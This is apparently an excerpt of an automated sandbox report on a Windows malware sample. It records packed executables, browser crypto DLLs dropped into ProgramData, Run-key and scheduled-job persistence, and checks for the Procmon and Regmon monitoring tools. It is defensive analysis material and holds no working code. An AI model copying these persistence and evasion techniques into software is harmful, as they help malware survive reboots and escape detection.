Source: random[1].exe0.18.dr Static PE information: real checksum: 0x0 should be: 0x19435
Source: enter[1].exe.0.dr Static PE information: real checksum: 0x1dbc9d should be: 0x1e053f
PE file contains sections with non-standard names
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: .idata
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: legihfsp
Source: random[1].exe.0.dr Static PE information: section name: iwukfltx
Source: random[1].exe.0.dr Static PE information: section name: .taggant
Source: RoamingBKJEGDGIJE.exe.0.dr Static PE information: section name:
Source: RoamingBKJEGDGIJE.exe.0.dr Static PE information: section name: .idata
Source: RoamingBKJEGDGIJE.exe.0.dr Static PE information: section name:
Source: RoamingBKJEGDGIJE.exe.0.dr Static PE information: section name: legihfsp
Source: RoamingBKJEGDGIJE.exe.0.dr Static PE information: section name: iwukfltx
Source: RoamingBKJEGDGIJE.exe.0.dr Static PE information: section name: .taggant
Source: enter[1].exe.0.dr Static PE information: section name:
Source: enter[1].exe.0.dr Static PE information: section name: .idata
Source: enter[1].exe.0.dr Static PE information: section name:
Source: enter[1].exe.0.dr Static PE information: section name: yaomedmc
Source: enter[1].exe.0.dr Static PE information: section name: ihlphrnj
Source: enter[1].exe.0.dr Static PE information: section name: .taggant
Source: RoamingIJEGDBGDBF.exe.0.dr Static PE information: section name:
Source: RoamingIJEGDBGDBF.exe.0.dr Static PE information: section name: .idata
Source: RoamingIJEGDBGDBF.exe.0.dr Static PE information: section name:
Source: RoamingIJEGDBGDBF.exe.0.dr Static PE information: section name: yaomedmc
Source: RoamingIJEGDBGDBF.exe.0.dr Static PE information: section name: ihlphrnj
Source: RoamingIJEGDBGDBF.exe.0.dr Static PE information: section name: .taggant
Source: axplong.exe.6.dr Static PE information: section name:
Source: axplong.exe.6.dr Static PE information: section name: .idata
Source: axplong.exe.6.dr Static PE information: section name:
Source: axplong.exe.6.dr Static PE information: section name: legihfsp
Source: axplong.exe.6.dr Static PE information: section name: iwukfltx
Source: axplong.exe.6.dr Static PE information: section name: .taggant
Source: explorti.exe.9.dr Static PE information: section name:
Source: explorti.exe.9.dr Static PE information: section name: .idata
Source: explorti.exe.9.dr Static PE information: section name:
Source: explorti.exe.9.dr Static PE information: section name: yaomedmc
Source: explorti.exe.9.dr Static PE information: section name: ihlphrnj
Source: explorti.exe.9.dr Static PE information: section name: .taggant
Source: random[1].exe0.18.dr Static PE information: section name: .code
Source: 5aa32fec17.exe.18.dr Static PE information: section name: .code
Source: gmpopenh264.dll.tmp.33.dr Static PE information: section name: .rodata
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041A9F5 push ecx; ret 0_2_0041AA08
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB6B536 push ecx; ret 0_2_6CB6B549
Source: file.exe Static PE information: section name: .text entropy: 7.823583257358654
Source: random[1].exe.0.dr Static PE information: section name: entropy: 7.97553764385012
Source: random[1].exe.0.dr Static PE information: section name: legihfsp entropy: 7.953386179247648
Source: RoamingBKJEGDGIJE.exe.0.dr Static PE information: section name: entropy: 7.97553764385012
Source: RoamingBKJEGDGIJE.exe.0.dr Static PE information: section name: legihfsp entropy: 7.953386179247648
Source: enter[1].exe.0.dr Static PE information: section name: entropy: 7.9835064162200045
Source: enter[1].exe.0.dr Static PE information: section name: yaomedmc entropy: 7.95396195458321
Source: RoamingIJEGDBGDBF.exe.0.dr Static PE information: section name: entropy: 7.9835064162200045
Source: RoamingIJEGDBGDBF.exe.0.dr Static PE information: section name: yaomedmc entropy: 7.95396195458321
Source: axplong.exe.6.dr Static PE information: section name: entropy: 7.97553764385012
Source: axplong.exe.6.dr Static PE information: section name: legihfsp entropy: 7.953386179247648
Source: explorti.exe.9.dr Static PE information: section name: entropy: 7.9835064162200045
Source: explorti.exe.9.dr Static PE information: section name: yaomedmc entropy: 7.95396195458321
Source: random[1].exe.18.dr Static PE information: section name: .text entropy: 7.823583257358654
Source: 7ca32398cd.exe.18.dr Static PE information: section name: .text entropy: 7.823583257358654
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File created: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File created: C:\Users\user\1000003002\5aa32fec17.exe Jump to dropped file
Source: C:\Program Files\Mozilla Firefox\firefox.exe File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll.tmp Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Program Files\Mozilla Firefox\firefox.exe File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll (copy) Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\enter[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Jump to dropped file
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 7ca32398cd.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 5aa32fec17.exe
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Creates job files (autostart)
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe File created: C:\Windows\Tasks\axplong.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 7ca32398cd.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 7ca32398cd.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 5aa32fec17.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 5aa32fec17.exe
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_004195E0
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
